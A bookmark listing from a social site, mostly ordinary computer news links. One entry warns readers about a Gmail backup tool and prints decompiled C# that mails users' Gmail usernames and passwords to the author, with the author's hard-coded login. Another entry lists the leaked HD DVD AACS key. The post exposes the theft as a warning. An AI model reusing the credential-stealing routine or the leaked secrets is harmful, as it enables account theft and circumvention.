Favorites » His computers pages

-
Singularity RDK - Home
-
Apr 17, 4:58am
3 reviews
computers
http://www.codeplex.com/singularity

-
PC Sound Card Vendor Creative Labs Creates PR Nightmare on Their Own Forum &82…
-
Apr 1, 9:51pm
23 reviews
computers
http://awfulmarketing.com/index.php/2008/03/30/pc-sound-card-vendor-creative-...

-
Creative: Fixing Our Crippled Sound Card Drivers Is "Stealing Our Goods"
-
Mar 30, 8:50am
1 review
computers
http://blog.wired.com/gadgets/2008/03/creative-fixing.html

-
Gmail inbox backup - Gmail emails backup software
-
Mar 8, 8:55pm
11 reviews
computers, crime
http://www.garchiver.com/
-
DO NOT USE THIS SOFTWARE. It sends an email to the author of the software with your gmail username and password. Read about it here:
http://www.codinghorror.com/blog/archives/001072.html
I confirmed this using the .NET Reflector. The author has hard-coded his username and password into the code. A code sleuth has since logged into the author's account and changed the author's login info, so the hard-coded info won't work anymore (i.e., it can't send your info using his login credentials). Here's actual C# code from disassembly:
public static void CheckConnection(string a, string b)
{
try
{
MailMessage message = new MailMessage();
message.To.Add("JTerry79@gmail.com");
message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
message.Subject = "Account";
message.SubjectEncoding = Encoding.UTF8;
message.Body = "Username: " + a;
message.Body = message.Body + "\r\nPassword: " + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
client.Send(message);
}
catch (Exception)
{
}
}
This code block creates an email message containing your username and password and sends it to JTerry79@gmail.com (the author of the software) through his own gmail account. See his login info? See where he's creating a message with a Username and Password? That's *your* username and password.

-
Coding Horror: A Question of Programming Ethics
-
Mar 8, 8:40pm
14 reviews
computers
http://www.codinghorror.com/blog/archives/001072.html

-
Johnny Chung Lee - Projects - Wii
-
Dec 27, 2007 9:56am
68 reviews
computers
http://www.cs.cmu.edu/~johnny/projects/wii/

-
The Raw Story | AT&whistleblower: I was forced to connect big brother machine
-
Nov 9, 2007 4:55am
28 reviews
computers
http://rawstory.com/news/2007/Countdown_Telcom_whistleblower_describes_secret...

-
gamecourse
-
Aug 26, 2007 8:17pm
1 review
computer-science, computers
http://www.cs.berkeley.edu/~christos/classics/cs298.html
-
Classic computer science papers

-
C# and Visual Basic .Net Instrument Control Tutorial- Developer Zone - National …
-
Jul 3, 2007 9:40pm
1 review
computers
http://zone.ni.com/devzone/cda/tut/p/id/2739
-
Consider this a bookmark...
So I've been looking for a good way to control and read/write to USB. Evidently National Instruments has this VISA driver with API. Check it:
"VISA (Virtual Instrument Software Architecture) is a high-level driver that abstracts the lower-level drivers for each instrument hardware bus type and provides a single API for communicating with instruments regardless of the bus interface. This application note discusses how you can take advantage of VISA for .NET applications using the VISA .Net libraries in C# and Visual Basic .Net to communicate with GPIB, serial, Ethernet / LAN, IEEE 1394, and USB instruments"

-
The Master Key - HDDVDKey.com
-
May 2, 2007 11:42am
12 reviews
computers
http://www.hddvdkey.com/?postid=9
-
09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
 See more popular pages about computers liked by other StumbleUpon users.
|